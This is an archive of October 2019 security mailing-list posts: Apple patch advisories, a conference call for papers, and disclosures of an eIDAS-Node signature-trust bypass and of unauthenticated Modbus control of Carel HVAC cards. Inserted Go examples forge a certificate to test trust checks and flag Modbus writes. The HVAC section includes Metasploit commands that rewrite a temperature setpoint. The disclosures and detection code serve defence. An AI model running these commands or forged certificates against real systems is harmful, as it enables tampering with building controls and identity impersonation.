CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab
Entry added October 29, 2019

CFNetwork
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: This issue was addressed with improved checks.
CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland
Entry added October 29, 2019

CoreAudio
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously crafted movie may result in the
disclosure of process memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
Entry added October 29, 2019

CoreCrypto
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a large input may lead to a denial of service
Description: A denial of service issue was addressed with improved
input validation.
CVE-2019-8741: Nicky Mouha of NIST
Entry added October 29, 2019

Foundation
Available for: Apple TV 4K and Apple TV HD
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project
Zero
Entry added October 29, 2019

IOUSBDeviceFamily
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8718: Joshua Hill and Sem Voigtländer
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2019-8740: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: A local app may be able to read a persistent account
identifier
Description: A validation issue was addressed with improved logic.
CVE-2019-8809: Apple
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8717: Jann Horn of Google Project Zero
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8712: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory corruption issue existed in the handling of
IPv6 packets. This issue was addressed with improved memory
management.
CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8709: derrek (@derrekr6)
Entry added October 29, 2019

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to determine kernel
memory layout
Description: The issue was addressed with improved permissions logic.
CVE-2019-8780: Siguza
Entry added October 29, 2019

Keyboards
Available for: Apple TV 4K and Apple TV HD
Impact: A local user may be able to leak sensitive user information
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC

libxml2
Available for: Apple TV 4K and Apple TV HD
Impact: Multiple issues in libxml2
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8749: found by OSS-Fuzz
CVE-2019-8756: found by OSS-Fuzz
Entry added October 29, 2019

libxslt
Available for: Apple TV 4K and Apple TV HD
Impact: Multiple issues in libxslt

[FD] APPLE-SA-2019-10-29-5 Safari 13.0.3

2019-10-31 Thread Apple Product Security via Fulldisclosure

APPLE-SA-2019-10-29-5 Safari 13.0.3

Safari 13.0.3 is now available and addresses the following:

WebKit
Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6,
and included in macOS Catalina 10.15.1
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8813: an anonymous researcher

WebKit
Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6,
and included in macOS Catalina 10.15.1
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8782: Cheolung Lee of LINE+ Security Team
CVE-2019-8783: Cheolung Lee of LINE+ Graylab Security Team
CVE-2019-8808: found by OSS-Fuzz
CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech
CVE-2019-8812: an anonymous researcher
CVE-2019-8814: Cheolung Lee of LINE+ Security Team
CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech
CVE-2019-8819: Cheolung Lee of LINE+ Security Team
CVE-2019-8820: Samuel Groß of Google Project Zero
CVE-2019-8821: Sergei Glazunov of Google Project Zero
CVE-2019-8822: Sergei Glazunov of Google Project Zero
CVE-2019-8823: Sergei Glazunov of Google Project Zero

WebKit Process Model
Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6,
and included in macOS Catalina 10.15.1
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8815: Apple

Additional recognition

WebKit
We would like to acknowledge Dlive of Tencent's Xuanwu Lab and Zhiyi
Zhang of Codesafe Team of Legendsec at Qi'anxin Group for their
assistance.

Installation note:

Safari 13.0.3 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] APPLE-SA-2019-10-29-1 iOS 13.2 and iPadOS 13.2

2019-10-31 Thread Apple Product Security via Fulldisclosure

APPLE-SA-2019-10-29-1 iOS 13.2 and iPadOS 13.2

iOS 13.2 and iPadOS 13.2 are now available and address the following:

Accounts
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at
Technische Universität Darmstadt

App Store
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: A local attacker may be able to login to the account of a
previously logged in user without valid credentials.
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu)

Associated Domains
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Improper URL processing may lead to data exfiltration
Description: An issue existed in the parsing of URLs. This issue was
addressed with improved input validation.
CVE-2019-8788: Juha Lindstedt of Pakastin, Mirko Tanania, Rauli
Rikama of Zero Keyboard Ltd

Audio
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8785: Ian Beer of Google Project Zero
CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure

AVEVideoEncoder
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8795: 08Tc3wBB working with SSD Secure Disclosure

Books
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A validation issue existed in the handling of symlinks.
This issue was addressed with improved validation of symlinks.
CVE-2019-8789: Gertjan Franken of imec-DistriNet, KU Leuven

Contacts
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Processing a maliciously crafted contact may lead to UI spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)

File System Events
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero
Day Initiative

Graphics Driver
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8784: Vasiliy Vasilyev and Ilya Finogeev of Webinar, LLC

Kernel
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure

Kernel
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8786: an anonymous researcher

Screen Time
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: A local user may be able to record the screen without a
visible screen recording indicator
Description: A consistency issue existed in deciding when to show the
screen recording indicator. The issue was resolved with improved
state management.
CVE-2019-8793: Ryan Jenkins of Lake Forrest Prep School

Setup Assistant
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An attacker in physical proximity may be able to force a user
onto a malicious Wi-Fi network during device setup
Description: An inconsistency in Wi-Fi network configuration settings
was addressed.
CVE-2019-8804: Christy Philip Mathew of Zimperium, Inc

WebKit

[FD] APPLE-SA-2019-10-29-7 Additional information for APPLE-SA-2019-9-26-4 Safari 13

2019-10-31 Thread Apple Product Security via Fulldisclosure

APPLE-SA-2019-10-29-7 Additional information
for APPLE-SA-2019-9-26-4 Safari 13

Safari 13 addresses the following:

WebKit
Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8625: Sergei Glazunov of Google Project Zero
CVE-2019-8719: Sergei Glazunov of Google Project Zero
Entry added October 29, 2019

WebKit
Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8707: an anonymous researcher working with Trend Micro's
Zero Day Initiative, cc working with Trend Micro Zero Day Initiative
CVE-2019-8726: Jihui Lu of Tencent KeenLab
CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of
ABLY Corporation
CVE-2019-8733: Sergei Glazunov of Google Project Zero
CVE-2019-8734: found by OSS-Fuzz
CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative
Entry added October 29, 2019

WebKit Page Loading
Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8674: Sergei Glazunov of Google Project Zero

Additional recognition

WebKit
We would like to acknowledge MinJeong Kim of Information Security
Lab, Chungnam National University, JaeCheol Ryou of the Information
Security Lab, Chungnam National University in South Korea, Yiğit Can
YILMAZ (@yilmazcanyigit), Zhihua Yao of DBAPPSecurity Zion Lab, an
anonymous researcher, and cc working with Trend Micro's Zero Day
Initiative for their assistance.

Installation note:

Safari 13 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/


[FD] RootedCON 2020 Call For Papers is open!

2019-10-31 Thread omarbv
__ _   _   ___  _   _ 
   / /  _ \ ___   ___ | |_ ___  __| |/ ___/ _ \| \ | |
  / /| |_) / _ \ / _ \| __/ _ \/ _` | |  | | | |  \| |
 / / |  _ < (_) | (_) | ||  __/ (_| | |__| |_| | |\  |
/_/  |_| \_\___/ \___/ \__\___|\__,_|\\___/|_| \_|
  
*** /RootedCON'2020 - Main event ***

-=] About RootedCON

RootedCON is a technology congress that will be held in Madrid
(Spain) from 5 to 7 March 2020.

With an estimated attendance of 2,500 to 3,000 people, it is the most
relevant specialized congress held in the country, and one of the most
relevant in Europe, with attendee profiles ranging from students and
Law Enforcement Agencies to professionals in the technology and
information security market and even just passionate people.

This is our XI edition, *after our tenth anniversary!* And as in every
edition, we want to make it special :)


-=] Talk types

We will mostly accept two kinds of talks:

- Fast talks:     20 minutes.
- Standard talks: 50 minutes.

There will be a limited number of talks of both types, with even the
possibility of working with the schedule to extend a talk beyond the
20-minute limit, or to shorten a 50-minute one.

We encourage you to BE ORIGINAL with your proposals. We accept *rare*
talks and themes, on culture or politics (always orbiting around
technological or Information Security concepts).


-=] International speakers

There is simultaneous Spanish-English and English-Spanish translation on
all tracks, so please do not hesitate to submit a talk, wherever you
are from :)

Be sure to indicate the language in which you will give it:

  [ES] - Spanish
  [EN] - English


-=] Topics we are looking for

Any interesting topic related to TECHNOLOGY, including but not limited
to the examples below:

- ANY original topic that contributes content to our audience!
- Any hacking topic in any environment: IP, OT, IoT, Cloud, EDGE,
Satellites, Mobiles...
- Reverse engineering, debugging, hooking, fuzzing, exploiting, DFIR,...
- APT, botnets and malware.
- Financial Tech (FinTech)
- Hardware Hacking, Jtag, SWJ, Dap, consoles,...
- Videogames, cheats...
- Cryptography, steganography, covert channels,...
- DEV/SEC/OPS.
- DEV: MQTT, AMQP, development patterns, distributed development,
CI/CD...
- OPS: puppet, jenkins, orchestration, virtualization and containers,
artifacts,...
- Culture, philosophy and ethics, future, innovation ... the world!

Remember that we have THREE (maybe FOUR) rooms in multitrack:

- Cibeles Room (~1000 people)
- Lugus Room (~500 people)
- Beginners Room (~500 people)
- Strategy Room (~500 people) (pending confirmation)


-=] Talk submission procedure

We will only accept talks submitted through the official speaker form:

https://cfp.rootedcon.com/  (both English and Spanish)

Any other talk submission will be considered "unofficial" and will have
no guarantee of being selected.


-=] Speaker benefits and privileges

Every speaker will get these benefits and privileges:

- ONE extra ticket for a partner (1 ticket) to attend the event.
- Dinner with all the speakers, RootedLABS trainees, sponsors and the
RootedCON team.
- Accommodation (RootedCON covers the costs, even for the partner)
- Travel (RootedCON covers the speaker's costs)
- Full access to all congress areas for the whole event.
- The possibility of repeating the talk up to three times, once in
every track (depending on the final rating).
- Some free drinks in the party :)
- Potential job offers management.
- A gift from the organization.


-=] Obligations and duties of the speaker

All speakers who submitted a talk and get selected must:

a) Confirm that the talk is TECHNICAL and is supported with Proofs of
Concept (PoC). If PoCs are not available, this should be justified.

b) Send the talk materials by the agreed dates before the congress.
Please include details about the PoCs.

c) Accept explicitly that all the materials in the talk, as well as the
audio and video, will be published, in any format and by any mechanism,
in RootedCON's content management systems or others.

*Please*, make sure you understand your duties as a speaker before
submitting a proposal.


-=] Sponsors and partners

RootedCON is always looking for new quality sponsors. If you have a
proposal or feel your organization may be interested, please contact
us at:

sponsors-AT-rootedcon.com

IMPORTANT: due to the mostly technical essence of the congress and the
preferences shown by our attendees in multiple polls, we recommend that
potential sponsors work on a talk aligned with the expectations of our
public.

Any help, comment, idea, proposal or collaboration will be evaluated in
depth: it is very important for our Congress to receive this kind of new
ideas, as we depend on you to do our best in building the Event.


-=] Critical things to consider

1. Time management and talk duration are 

[FD] SEC Consult SA-20191029-0 :: Authentication Bypass in eIDAS-Node (European #eGovernment cross-border authentication)

2019-10-31 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20191029-0 >
=======================================================================
              title: Authentication Bypass
            product: eIDAS-Node
 vulnerable version: <=v2.3 (v2.1 vulnerability #2)
      fixed version: v2.3.1
         CVE number: -
             impact: critical
           homepage: https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/eIDAS-Node+Integration+Package
              found: 2019-06
                 by: Wolfgang Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
---
"The eIDAS-Node software is a sample implementation of the eID eIDAS Profile. It
was developed by the European Commission with the help of Member States
collaborating in the technical sub-committee of the eIDAS Expert Group. The
eIDAS-Node software contains the necessary modules to help Member States to
communicate with other eIDAS-compliant counterparts in a centralised or
distributed fashion."

URL: https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/eIDAS-Node+Integration+Package


Business recommendation:
---
During a short crash test SEC Consult identified critical vulnerabilities in
the eIDAS-Node software component (EU cross-border authentication). These
vulnerabilities could allow an attacker to impersonate any EU citizen.

SEC Consult recommends immediately applying the patch provided by the
vendor, if this has not happened yet.
Moreover, SEC Consult recommends operators of eIDAS-Node installations to
conduct a forensic investigation into whether this vulnerability has already
been abused.


Vulnerability overview/description:
---
The communication between eIDAS Member States (MS) is based on SAML. The
eIDAS node of an MS providing a service to citizens of another MS sends a
SAML AuthNRequest to an eIDAS node that is capable of authenticating the citizen
through her national authentication scheme (e.g. id card authentication).

After the citizen has successfully authenticated, a SAML response is sent to the
requesting eIDAS node. To verify the authenticity of the SAML response,
eIDAS-Node verifies its signature and checks whether the signing certificate
is trusted.

Vulnerability #1: Certificate Faking
The verification of the certificate trust is implemented as follows:
1. The certificate is accepted if it is in the local trust store
2. Otherwise the issuer certificate of the entity certificate is retrieved from
   either the local trust store or from the supplemental certificates in the
   SAML response.
3. If a trust path can be established between the issuer certificate and a
   certificate in the trust store, the entity certificate is accepted.

It was found that, in step 2, the application searches for the issuer
certificate by comparing the Issuer DN of the entity certificate to the Subject
DN of the potential issuer certificates.

The application does not verify whether the entity certificate has been
correctly signed by the issuer certificate. Moreover, other checks, such as
whether the basic constraints of the issuer certificate allow it to act as a
certificate issuer, are not performed.

An attacker can therefore sign a manipulated SAML response with a forged
certificate. The certificate must contain an Issuer DN that matches the subject
of a certificate in the trust store. The subject must contain the country of
the citizen (e.g. CN=FAKE, C=AT).


Vulnerability #2: Missing Certificate Validation
At least version 2.1 of the software uses the OpenSAML class
ExplicitKeyTrustEvaluator to check whether the signer certificate is trusted.
The method validate(...) returns a boolean value indicating whether trust could
be established. However, eIDAS-Node does not check the return value and
continues processing the SAML response. As the certificate's trust is
effectively not verified, an attacker can sign the SAML response with any
certificate.

This advisory demonstrates vulnerabilities against the endpoint that processes
SAML responses. Other endpoints (e.g. the ones that process SAML requests) are
likely affected as well (this has only partly been verified).

NOTE: Version 2.1 is no longer supported in favor of version 2.3.1.


Proof of concept:
---
Vulnerability #1: Certificate Faking
The following Java class demonstrates the attack:

- snip -
package com.sec_consult.eidas_node.autologin;

import java.io.InputStream;
import java.math.BigInteger;
import java.net.URI;
import java.security.InvalidKeyException;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import 
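
Added example (not SEC Consult's PoC and not eIDAS-Node code; written in Go rather than the project's Java so that it runs stand-alone on the standard library): the DN-only issuer lookup the advisory describes beside a version that adds the missing signature and basic-constraints checks, exercised against constructed test certificates. The CA name, the host name eidas-node.example and all keys are made up for the test.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// flawedIsTrusted reproduces steps 2-3 of the evaluation the advisory describes:
// the "issuer" is whatever trusted certificate has a Subject DN equal to the
// entity's Issuer DN, and finding one is taken as proof of trust. No signature check.
func flawedIsTrusted(entity *x509.Certificate, store []*x509.Certificate) bool {
	for _, t := range store {
		if bytes.Equal(t.RawSubject, entity.RawIssuer) { // a name comparison is all that happens
			return true
		}
	}
	return false
}

// hardenedIsTrusted adds what the advisory reports as missing: the DN-matched
// candidate must have signed the entity and must be a CA, and the chain is then
// path-validated. It returns an error the caller must act on, not a droppable boolean.
func hardenedIsTrusted(entity *x509.Certificate, store []*x509.Certificate) error {
	roots := x509.NewCertPool()
	for _, t := range store {
		roots.AddCert(t)
	}
	err := fmt.Errorf("no trusted certificate with a matching Subject DN")
	for _, c := range store {
		if !bytes.Equal(c.RawSubject, entity.RawIssuer) {
			continue
		}
		// CheckSignatureFrom verifies the signature and also rejects a parent whose
		// basic constraints say it is not a CA or whose key usage lacks certSign.
		if err = entity.CheckSignatureFrom(c); err != nil {
			err = fmt.Errorf("%q did not sign the entity: %w", c.Subject.String(), err)
			continue
		}
		_, err = entity.Verify(x509.VerifyOptions{Roots: roots, // validity period, full path
			KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny}})
		return err
	}
	return err
}

func mint(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, signer *ecdsa.PrivateKey) (*x509.Certificate, error) {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer) // Issuer DN = parent's Subject
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// buildFixtures makes constructed test material (not real eIDAS certificates): a
// Member State CA, a node certificate it issued, and a forged certificate whose
// Issuer DN names that CA but which is signed with an attacker-held key.
func buildFixtures() (ca, legit, forged *x509.Certificate, err error) {
	var keys [3]*ecdsa.PrivateKey // CA, node, attacker
	for i := range keys {
		if keys[i], err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader); err != nil {
			return
		}
	}
	tmpl := func(serial int64, cn string) *x509.Certificate {
		return &x509.Certificate{
			SerialNumber: big.NewInt(serial),
			Subject:      pkix.Name{CommonName: cn, Country: []string{"AT"}},
			NotBefore:    time.Now().Add(-time.Hour),
			NotAfter:     time.Now().Add(24 * time.Hour),
		}
	}
	caTmpl := tmpl(1, "Test Member State CA")
	caTmpl.IsCA, caTmpl.BasicConstraintsValid, caTmpl.KeyUsage = true, true, x509.KeyUsageCertSign
	if ca, err = mint(caTmpl, caTmpl, &keys[0].PublicKey, keys[0]); err != nil {
		return
	}
	if legit, err = mint(tmpl(2, "eidas-node.example"), ca, &keys[1].PublicKey, keys[0]); err != nil {
		return
	}
	// The parent carries only the CA's name: Issuer DN matches the store, signature is the attacker's.
	forged, err = mint(tmpl(3, "FAKE"), &x509.Certificate{Subject: caTmpl.Subject}, &keys[2].PublicKey, keys[2])
	return
}

func main() {
	ca, _, forged, err := buildFixtures()
	if err != nil {
		panic(err)
	}
	fmt.Println("flawed:", flawedIsTrusted(forged, []*x509.Certificate{ca}), "hardened:", hardenedIsTrusted(forged, []*x509.Certificate{ca}))
}
```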

[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

As part of its features, the Carel pCOWeb card exposes a Modbus
interface to the network. By design, Modbus does not provide
authentication, allowing anyone to control the affected system.


Details
===

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Unauthenticated Access
Security Risk: high
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-14
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that
use the HVAC protocols based on the Ethernet physical standard, such as
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated
Web-Server, which both contains the HTML pages relating to the specific
application and allows a browser to be used for remote system
management."
(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and
considered obsolete by the vendor.


More Details
============

While authentication is required to access the web interface (compare
advisory rt-sa-2019-013 [0]) no authentication is necessary for using
the Modbus interface on TCP port 502, since the Modbus protocol did not
offer any authentication mechanism during the device's lifetime.
The addition of encryption and authentication was only recently proposed
by the Modbus Organization [1].

It is believed that this might be analogous to the problem described in
CVE-2019-13549 for the special case of Rittal SK 3232 products. Other
OEMs are affected, too.


Proof of Concept
================

The web interface of the Carel pCOWeb card allows authenticated users to
read and write many variables of the system via the URL

http://192.168.0.1/config/adminpage.html

This web page seems to provide access to all Modbus variables using
large tables of variables 1-207 for digital, analog and integer
variables, respectively.

By accessing TCP port 502 (Modbus to TCP), it is possible to access
these variables without authentication. This can be done, for example,
by using the Metasploit [2] modbusclient [3] module:


msf5 > use auxiliary/scanner/scada/modbusclient
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.0.1
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10
DATA_ADDRESS => 10
msf5 auxiliary(scanner/scada/modbusclient) > run

[*] 192.168.0.1:502 - Sending READ REGISTERS...
[+] 192.168.0.1:502 - 1 register values from address 10 :
[+] 192.168.0.1:502 - [240]
[*] Auxiliary module execution completed


The returned value matches the set temperature of 24°C multiplied by
ten, as the variable can only hold integers. Using the same module, it
is possible to change the temperature setpoint, too:


msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER
ACTION => WRITE_REGISTER
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241
DATA => 241
msf5 auxiliary(scanner/scada/modbusclient) > run

[*] 192.168.0.1:502 - Sending WRITE REGISTER...
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10
[*] Auxiliary module execution completed


This allows unauthenticated remote attackers to reconfigure the device.

Depending on OEM integration, different variables might represent
different settings.

Additionally, the system provides SNMP (UDP Port 161) write access with
the SNMP community string "public" or "carel" (depending on version) as
documented in the manual [4] and BACnet over IP (UDP Port 47808).

Workaround
==========

The Carel pCOWeb card should not be connected to networks accessible by
untrusted users.


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=============

Since the Modbus protocol implemented in the Carel pCOWeb card does not
offer authentication, it is not possible to limit access to the system
to authorized users, allowing attackers to control the system if the
device is accessible via the network. This is considered to pose a high
risk in the context of the Carel pCOWeb card.


Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor 
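
Added example (not RedTeam's code and not part of the advisory): a Modbus/TCP frame decoder with a detection rule that flags write function codes from hosts outside an allow-list, run over constructed frames mirroring the read and the write of register 10 shown above. The client addresses 192.168.0.99 and 192.168.0.10 and the allow-list are assumptions; Go was chosen so the check runs stand-alone.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Frame is a decoded Modbus/TCP application data unit: MBAP header plus PDU.
type Frame struct {
	TransactionID uint16
	UnitID        byte
	Function      byte
	Data          []byte // PDU payload after the function code
}

// Capture is one request as seen on the wire, with the IP it came from.
type Capture struct {
	Src   string
	Frame []byte
}

// Alert marks a state-changing request from a host not allowed to issue one.
type Alert struct {
	Src, Function, Detail string
	Address               uint16
}

// Function codes that modify process state. The protocol has no way to refuse
// them, so reachability and monitoring are the only control points.
var writeFunctions = map[byte]string{
	5: "Write Single Coil", 6: "Write Single Register", 15: "Write Multiple Coils",
	16: "Write Multiple Registers", 22: "Mask Write Register", 23: "Read/Write Multiple Registers",
}

// parseModbusTCP validates the MBAP header and splits out the PDU.
func parseModbusTCP(b []byte) (Frame, error) {
	if len(b) < 8 {
		return Frame{}, fmt.Errorf("frame too short: %d bytes", len(b))
	}
	if proto := binary.BigEndian.Uint16(b[2:4]); proto != 0 {
		return Frame{}, fmt.Errorf("protocol id %d is not Modbus", proto)
	}
	if l := int(binary.BigEndian.Uint16(b[4:6])); l != len(b)-6 { // length = unit id + PDU
		return Frame{}, fmt.Errorf("length field %d but %d payload bytes", l, len(b)-6)
	}
	return Frame{TransactionID: binary.BigEndian.Uint16(b[0:2]), UnitID: b[6], Function: b[7], Data: b[8:]}, nil
}

// inspect decodes one captured request and returns an Alert when it is a write
// from a source outside allowedWriters; reads and allowed writes return nil.
func inspect(c Capture, allowedWriters map[string]bool) (*Alert, error) {
	f, err := parseModbusTCP(c.Frame)
	if err != nil {
		return nil, err
	}
	name, isWrite := writeFunctions[f.Function]
	if !isWrite || allowedWriters[c.Src] {
		return nil, nil
	}
	if len(f.Data) < 4 { // every write PDU starts with a 2-byte address and a 2-byte value or count
		return nil, fmt.Errorf("write PDU too short: %d bytes", len(f.Data))
	}
	addr, second := binary.BigEndian.Uint16(f.Data[0:2]), binary.BigEndian.Uint16(f.Data[2:4])
	return &Alert{Src: c.Src, Function: name, Address: addr,
		Detail: fmt.Sprintf("unit %d: address %d, value/count %d", f.UnitID, addr, second)}, nil
}

// scan runs inspect over a capture and collects the alerts.
func scan(capture []Capture, allowedWriters map[string]bool) ([]Alert, error) {
	var alerts []Alert
	for _, c := range capture {
		a, err := inspect(c, allowedWriters)
		if err != nil {
			return nil, err
		}
		if a != nil {
			alerts = append(alerts, *a)
		}
	}
	return alerts, nil
}

// Constructed sample traffic mirroring the advisory's session against register 10
// (the setpoint in tenths of a degree): a read, the device's reply, the write of 241
// from an unknown host, and the same write from the assumed BMS host 192.168.0.10.
var sampleCapture = []Capture{
	{"192.168.0.99", []byte{0, 1, 0, 0, 0, 6, 1, 3, 0, 10, 0, 1}},   // FC3: read 1 register at 10
	{"192.168.0.1", []byte{0, 1, 0, 0, 0, 5, 1, 3, 2, 0, 240}},      // reply from the pCOWeb: 240
	{"192.168.0.99", []byte{0, 2, 0, 0, 0, 6, 1, 6, 0, 10, 0, 241}}, // FC6: write 241 to register 10
	{"192.168.0.10", []byte{0, 3, 0, 0, 0, 6, 1, 6, 0, 10, 0, 240}}, // same write, allowed host
}

func main() {
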